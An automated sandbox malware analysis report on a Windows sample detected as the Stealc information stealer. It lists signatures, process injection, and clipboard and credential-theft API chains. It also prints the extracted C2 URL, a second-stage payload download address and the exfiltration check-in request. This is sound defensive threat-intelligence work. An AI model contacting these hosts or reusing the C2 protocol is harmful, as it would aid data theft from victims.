
Windows Analysis Report
VAIIBIHmtT.exe

Overview

General Information

Sample name: VAIIBIHmtT.exe (renamed because the original name is a hash value)
Original sample name: 35489d9dc0929e90b0b89b4f569df8c1.exe
Analysis ID: 1542425
MD5: 35489d9dc0929e90b0b89b4f569df8c1
SHA1: 57010eda768b5bf82e306443f1df42f521bbad91
SHA256: 53fe5c2231b5b1753668ef852cb61e233cc389fdf8a2ac6afe2028bdd9509df6
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • VAIIBIHmtT.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\VAIIBIHmtT.exe" MD5: 35489D9DC0929E90B0B89B4F569DF8C1)
    • VAIIBIHmtT.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\VAIIBIHmtT.exe" MD5: 35489D9DC0929E90B0B89B4F569DF8C1)
      • 81C9.tmp.exe (PID: 7456 cmdline: "C:\Users\user\AppData\Local\Temp\81C9.tmp.exe" MD5: E00B441455DC50083BB537C343EB1B99)
        • WerFault.exe (PID: 7616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1188 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0xf98:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Source | Rule | Description | Author | Strings
2.3.81C9.tmp.exe.b70000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
2.3.81C9.tmp.exe.b70000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
2.2.81C9.tmp.exe.b20e67.3.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
2.2.81C9.tmp.exe.b20e67.3.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
2.2.81C9.tmp.exe.400000.1.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
                    No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-25T22:37:15.321806+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 62.204.41.177 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-25T22:37:05.562686+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 104.21.56.70 | 443 | TCP
2024-10-25T22:37:06.688285+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | TCP

                    AV Detection

Source: VAIIBIHmtT.exe | Avira: detected
Source: 00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | ReversingLabs: Detection: 34%
Source: VAIIBIHmtT.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Joe Sandbox ML: detected
Source: VAIIBIHmtT.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B274A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B29DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B29D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B39107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat

                    Compliance

Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Unpacked PE file: 1.2.VAIIBIHmtT.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Unpacked PE file: 2.2.81C9.tmp.exe.400000.1.unpack
Source: VAIIBIHmtT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B21937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B34107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B2EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B347D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B33B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: 2_2_00B34B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_004027D0 GetNumberFormatW,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,EnumTimeFormatsW,GetTempFileNameW,IsBadCodePtr,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus

                    Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 62.204.41.177:80
Source: Malware configuration extractor | URLs: http://62.204.41.177/edd20096ecef326d.php
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 25 Oct 2024 20:37:06 GMT | Server: Apache/2.4.41 (Ubuntu) | Last-Modified: Fri, 25 Oct 2024 20:30:02 GMT | ETag: "55e00-62552fbce3b10" | Accept-Ranges: bytes | Content-Length: 351744 | Content-Type: application/x-msdos-program
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 62.204.41.177 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI | Host: 62.204.41.177 | Content-Length: 219 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------DAECFIJDAAAKECBFCGHI Content-Disposition: form-data; name="hwid" B2BAB85921823381591466 ------DAECFIJDAAAKECBFCGHI Content-Disposition: form-data; name="build" default9_cap ------DAECFIJDAAAKECBFCGHI--
Source: Joe Sandbox View | IP Address: 176.113.115.37
Source: Joe Sandbox View | ASN Name: TNNET-ASTNNetOyMainnetworkFI
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 176.113.115.37:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 104.21.56.70:443
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1 | User-Agent: ShareScreen | Host: post-to-me.com
Source: global traffic | HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1 | User-Agent: ShareScreen | Host: 176.113.115.37
Source: global traffic | DNS traffic detected: DNS query: post-to-me.com
Source: unknown | HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI | Host: 62.204.41.177 | Content-Length: 219 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------DAECFIJDAAAKECBFCGHI Content-Disposition: form-data; name="hwid" B2BAB85921823381591466 ------DAECFIJDAAAKECBFCGHI Content-Disposition: form-data; name="build" default9_cap ------DAECFIJDAAAKECBFCGHI--
Source: VAIIBIHmtT.exe, VAIIBIHmtT.exe, 00000001.00000002.4169795931.0000000000775000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000003.4009441376.0000000000774000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000002.4169669321.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
Source: VAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
Source: VAIIBIHmtT.exe, 00000001.00000002.4169795931.0000000000775000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000003.4009441376.0000000000774000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe8
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008489449.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177)
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.000000000086C000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/=
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpM
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpQ
Source: 81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/ows
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.0000000000736000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/
Source: VAIIBIHmtT.exe | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: VAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: VAIIBIHmtT.exe, 00000001.00000002.4169669321.0000000000736000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000002.4169669321.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,1_2_004016E3
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,1_2_004016E3

                    System Summary

                    Source: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00740110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0040C4D8
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0040B89C
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0040D549
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00404D4D
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0040B358
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0040BDE0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00403DED
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0075706F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_007540E5
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_007681B6
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0074F339
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00768460
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0075946F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0076F4A0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0077767F
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00768727
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_007548CB
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_007689E2
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00767E44
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_0076DEAE
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 0_2_00768F20
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00428042
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_004071D0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_004373F9
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_004274A4
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_0042D50E
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00428580
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_004166CF
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00413745
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00427816
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_0040E999
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00427AC0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00418ACF
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_0042EB00
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00436CDF
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00427D87
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: 1_2_00413F2B
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Code function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: String function: 00410740 appears 52 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: String function: 0040F928 appears 36 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: String function: 0040FDD7 appears 123 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: String function: 007510E0 appears 51 times
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exe | Code function: String function: 00750777 appears 119 times
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1188
                    Source: VAIIBIHmtT.exe | Binary or memory string: OriginalFileName vs VAIIBIHmtT.exe
                    Source: VAIIBIHmtT.exe, 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs VAIIBIHmtT.exe
